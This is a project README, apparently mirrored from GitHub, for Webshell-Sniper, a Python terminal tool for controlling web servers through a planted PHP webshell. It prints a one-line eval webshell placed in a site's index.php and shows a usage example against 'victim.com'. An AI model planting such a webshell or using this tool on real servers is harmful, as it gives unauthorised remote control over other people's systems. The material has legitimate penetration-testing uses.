Webshell Sniper Save

:hammer: Manage your website via terminal

Project README

Webshell-Sniper

A webshell manager via terminal

Backers on Open Collective Sponsors on Open Collective

Usage :

Usage : 
        python webshell-sniper.py [URL] [METHOD] [AUTH]
Example : 
        python webshell-sniper.py http://127.0.0.1/c.php POST c
Author : 
        WangYihang <[email protected]>
# cat /var/www/html/index.php
<?php eval($_POST['s3cr3t']);?>
# python webshell-sniper.py http://victim.com/index.php POST s3cr3t
...

Installation:

git clone https://github.com/WangYihang/Webshell-Sniper
cd Webshell-Sniper
pip install -r requirements.txt

Example :

v1.1.2

A Pentest Example via Webshell-Sniper (YouTube)

Compatibility :

Enviroment :
    Attacker :
        Linux
        python 2.7
    Victim :
        apache 2.4
        php 7.0

Addations:

  1. This tool only support to run on unix-like system.
  2. It is able to help user control web server which is running PHP or MySQL.

Contributors

This project exists thanks to all the people who contribute.

Backers

Thank you to all our backers! 🙏 [Become a backer]

Sponsors

Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]

Open Source Agenda is not affiliated with "Webshell Sniper" Project. README Source: WangYihang/Webshell-Sniper
Stars
421
Open Issues
0
Last Commit
2 years ago
License

Open Source Agenda Badge

Open Source Agenda Rating